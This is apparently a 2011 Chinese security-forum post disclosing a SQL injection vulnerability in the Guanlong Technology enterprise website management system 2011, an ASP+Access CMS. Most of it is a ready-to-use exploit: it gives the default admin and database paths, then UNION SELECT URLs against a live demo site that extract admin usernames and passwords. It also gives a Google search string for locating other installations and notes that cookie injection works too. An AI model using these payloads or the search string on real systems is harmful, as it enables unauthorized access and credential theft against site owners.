冠龙科技企业网站管理系统2011 sql注入漏洞

作者：hack1990 时间：11-09-18 阅读数：742人阅读

冠龙科技企业网站管理系统是基于ASP+ACCESS技术开发的电子商务平台,属于全自动化、全智能的在线方

式管理、维护、更新的网站管理系统。此系统直接上传到你的网站空间就可以使用了。完全后台操作。

源码下载:
http://www.mycodes.net/25/4771.htm

Demo:
http://www1.glgk.com/2011/

默认后台:
http://127.0.0.1/admin/login.asp

默认数据库:
http://127.0.0.1/databases/%23database.mdb

exp:
http://www1.glgk.com/2011/CompVisualizeBig.asp?id=23 union select 1,username%2bpassword,3,4,5 from admin

或者单独查:
http://www1.glgk.com/2011/CompVisualizeBig.asp?id=23 union select 1,username,3,4,5 from admin
http://www1.glgk.com/2011/CompVisualizeBig.asp?id=23 union select 1,password,3,4,5 from admin

另外还存在多处的漏洞.可cookies注入.

google test:
销售热线:0571-85635810 技术支持:0571-85635810 地址:浙江省杭州市邮编:310000

# Nmap Security Scanner 7.0

上一篇：WordPress插件editormonkey-FCKe多个上传文件缺陷

下一篇：Linux防ARP攻击和嗅探

冠龙科技企业网站管理系统2011 sql注入漏洞

相关文章

发表评论